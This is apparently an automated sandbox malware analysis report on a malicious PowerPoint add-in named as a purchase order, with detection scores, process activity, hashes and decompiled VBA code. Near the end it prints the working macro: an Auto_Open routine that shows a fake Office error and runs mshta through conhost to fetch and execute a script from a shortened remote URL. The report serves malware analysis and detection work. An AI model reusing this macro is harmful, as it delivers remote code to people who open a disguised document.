Windows Analysis Report PO04012022.ppam
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Machine Learning detection for sample |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Document contains an embedded VBA macro with suspicious strings |
Source: | OLE, VBA macro: | Name: lol |
Source: | OLE, VBA macro: | Name: Auto_Open |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection11 | LSASS Memory | System Information Discovery11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse | ||
28% | ReversingLabs | Document-Word.Trojan.Heuristic | ||
100% | Joe Sandbox ML |
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
No contacted domains info |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| low | ||
true |
| unknown | ||
true |
| unknown |
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 548357 |
Start date: | 05.01.2022 |
Start time: | 16:06:21 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | PO04012022.ppam |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 2 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal60.expl.winPPAM@7/2@0/0 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
No simulations |
---|
No context |
---|
No context |
---|
No context |
---|
No context |
---|
No context |
---|
Process: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.48337186543544 |
Encrypted: | false |
SSDEEP: | 24:8dC5k/XT/4IicoLpNe4H5g/Dv3qAQd7Qy:8wk/XTA559N15FAUj |
MD5: | 7C62E662684F8C5BC941E653A458CD4D |
SHA1: | D85A723FEADF29F74DDF94D0B95C14608BF00DA4 |
SHA-256: | C53954AFEA57BB99626DDBC48944789CA85089FED74B955DB37B92FA43F6C32D |
SHA-512: | 1FF75E15C9647C0DEBE25EFD99A9674F30A9E530A26502523F3F132D3AF68F04B1AD7B49A3CECC58CC63D4C750F6B82F0AEBA28915F9BAF782C6AD59C889CEAD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 72 |
Entropy (8bit): | 4.551277869757234 |
Encrypted: | false |
SSDEEP: | 3:bDuMJltPX+mxW+e+X+v:bCmPu+A |
MD5: | AD7401DED5269BBF01E6F7C41559C1E4 |
SHA1: | 3E06C27F37789359898B4BADFEDF0880B3863214 |
SHA-256: | 53575C137FFBC45488C16115E65BC66F8D57C24A63291699AF729DAE52476C1D |
SHA-512: | 984F85FB39DDC38A0C38E579F21D99694D05C70B857B54DC908DA40D715810C18CBBE798D6D4644025B42E0523156E41F8E39A340282AF5C813E1F398E0E99CE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.633099793344531 |
TrID: |
|
File name: | PO04012022.ppam |
File size: | 8801 |
MD5: | d58141c856b4831f0c7deb594c4fd25b |
SHA1: | 87ab8351719c70bc5f611d736e32a8a19fce8a2f |
SHA256: | a0f6d9d905b64be221a64da385ad1fd14542c93b35f23cdcbedf71febc68a505 |
SHA512: | 0b739f25e56fa13d8db7f25e883cbfd0e8d2470adc3c0de45049da8530eec15c4e1627930534bd6356f162f9d7ce2c70c3ea0256805d6eb6ed31f180cda5a1a9 |
SSDEEP: | 192:sz8PvSFUzffz6qQaQzGbjeaS1UujK2ho/Erp/Z2i7H:sz8PvQULzCKKQQMEr1t |
File Content Preview: | PK..........#T^.......U.......[Content_Types].xml...N.0...H.C...dp@......&1..M.6.:Q....I....Ti........r.wb....\....H.U..\.o..{)".U.9.\.1.eq}...=F...s.2....i....GJ....8.C.=.OhP...w.8b$.x.!......X.v.......H.F...;k.SQ.T.>f...A5......K.o..]...7pv........8K... |
File Icon |
---|
Icon Hash: | 9e9ab2eaccdcdcdc |
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
Start time: | 16:06:19 |
Start date: | 05/01/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13faa0000 |
File size: | 2163560 bytes |
MD5 hash: | EBBBEF2CCA67822395E24D6E18A3BDF6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
LPC Port Activities
Start time: | 16:06:21 |
Start date: | 05/01/2022 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4aad0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Windows UI Activities
LPC Port Activities
Start time: | 16:06:22 |
Start date: | 05/01/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fbf0000 |
File size: | 2163560 bytes |
MD5 hash: | EBBBEF2CCA67822395E24D6E18A3BDF6 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
Object Security Activities
LPC Port Activities
Start time: | 16:06:26 |
Start date: | 05/01/2022 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff220000 |
File size: | 338432 bytes |
MD5 hash: | CE476F23405AADC46039AC13127DF473 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
File Activities
Section Activities
Process Activities
Thread Activities
Memory Activities
System Activities
LPC Port Activities
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Class1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Class1" |
2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = False |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Assert | |
Shell | Shell( |
Strings | Decrypted Strings |
---|---|
"c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd" |
Line | Instruction | Meta Information |
---|---|---|
9 | Public Function lol() | |
10 | Debug.Assert (VBA.Shell("c:\windows\system32\calc\..\conhost.exe c:\windows\system32\calc\..\conhost.exe mshta http://www.j.mp/askswewewewzxzxkd")) | Assert Shell( |
11 | End Function |
Module: Module11 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "Module11" |
Executed Functions |
---|
APIs | Meta Information |
---|---|
Part of subcall function lol@Class1: Assert | |
Part of subcall function lol@Class1: Shell |
Line | Instruction | Meta Information |
---|---|---|
2 | Sub Auto_Open() | |
3 | Dim obj as New Class1 | executed |
4 | Debug.Print MsgBox("ERROR!Re-Install Office", vbOKCancel); returns; 1 ' BAD ! | |
5 | obj.lol | |
6 | End Sub |